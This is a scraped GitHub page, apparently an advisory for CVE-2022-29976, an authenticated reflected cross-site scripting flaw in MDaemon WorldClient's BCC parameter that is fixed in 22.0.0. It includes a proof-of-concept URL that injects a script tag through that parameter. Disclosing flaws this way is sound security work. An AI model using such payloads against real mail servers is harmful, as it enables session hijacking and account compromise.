Headline
CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-
An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .
Permalink
main
Switch branches/tags
MDaemon-/MDaemon XSS at BCC endpoint****
Go to file
Go to file
Copy path
Copy permalink
Cannot retrieve contributors at this time
9 lines (5 sloc) 243 Bytes
Raw Blame
- Open with Desktop
- View raw
- Copy raw contents
- View blame
Product: MDaemon
Status: Fixed at version 22.0.0
Poc
https://localhost/WorldClient.dll?Session=<session_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS_TEST_BY_GTN%27)%3C/script%3E
XSS executed
Related news
CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-
An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .